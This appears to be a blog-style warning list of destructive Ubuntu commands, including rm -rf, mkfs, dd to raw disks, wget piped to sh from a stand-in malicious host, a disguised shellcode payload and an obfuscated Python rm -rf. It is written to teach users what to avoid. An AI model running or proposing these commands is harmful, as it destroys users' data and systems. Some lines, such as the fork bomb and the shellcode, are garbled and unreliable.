The following commands can cause massive damage to your Ubuntu operating system! Please DO NOT execute any of them, just read and learn!
sudo rm -rf / sudo rm -rf . sudo rm -rf * rm -rf * or rm -rf *.* rm -rf ~/ &
All the below commands will erase your hard drive!
sudo mkfs sudo mkfs.ext2 sudo mkfs.ext3 sudo mkfs.ext4 sudo mkfs.bfs sudo mkfs.cramfs sudo mkfs.minix sudo mkfs.msdos sudo mkfs.reiserfs sudo mkfs.vfat
The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!
sudo dd if=/dev/zero of=/dev/hda sudo dd if=/dev/hda of=/dev/hdb sudo dd if=something of=/dev/hda
WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb or any partition or hard drive you may have on your system!
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data!
any_command > /dev/sda dd if=something of=/dev/sda
Forkbomb : It is a malicious script that will execute a huge number of processes until your system freezes, forcing you to do a hard reboot which may cause data corruption or data damage.
The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON’T EXECUTE THEM!
fork while fork
Tarbomb: Let’s say that someone who wants to help you, offers you a tar.gz or tar.bz2 archive and he asks you to extract it into an existing directory. This archive can be crafted to explode into a million of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created directory!
Decompression bomb: Here’s another example. Let’s say someone asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!
Shellscript: This one is also very dangrous! Someone gives you a link to download, to a shellscript and then he asks you to execute it. This script can contain any command he chooses (from the above examples). Do not execute code from people you don’t trust! Here are some examples:
wget http://some_place/some_file sh ./some_file
wget http://hax018r.org/malicious-script sh ./malicious-script
wget http://some_place/some_file -O- | sh
wget http://hax018r.org/malicious-script -O- | sh
WARNING: Remember that the above examples can have any name!
Compiling code: A person gives you the source code to an application and tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Therefore, Do not compile or execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. Softpedia, SourceForge, Freshmeat, the author’s homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:
char esp __attribute__ ((section(".text"))) /* e.s.p release */ = "xebx3ex5bx31xc0x50x54x5ax83xecx64x68" "xffxffxffxffx68xdfxd0xdfxd9x68x8dx99" "xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7" "x56x04xf7x56x08xf7x56x0cx83xc4x74x56" "x8dx73x08x56x53x54x59xb0x0bxcdx80x31" "xc0x40xebxf9xe8xbdxffxffxffx2fx62x69" "x6ex2fx73x68x00x2dx63x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
To the new and inexperienced computer user, this looks like the “hex code gibberish stuff” that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.
Here’s another example of code that should definitely NOT be executed by anyone!
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Where “sn!.sg!+” is simply rm -rf * shifted a character up.
In conclusion, all new and inexperienced users who want to learn Ubuntu should start learning the above commands first and what they can do to your system.
mv /home/yourhomedirectory/* /dev/null
This command will move all the files inside your home directory to a place that doesn’t exist; hence you will never ever see those files again.
badblocks -vfw /dev/fd0 10000 ; reboot
Replace /dev/fd0 with the device name of your boot drive and this DESTRUCTIVE command will render your drive unbootable.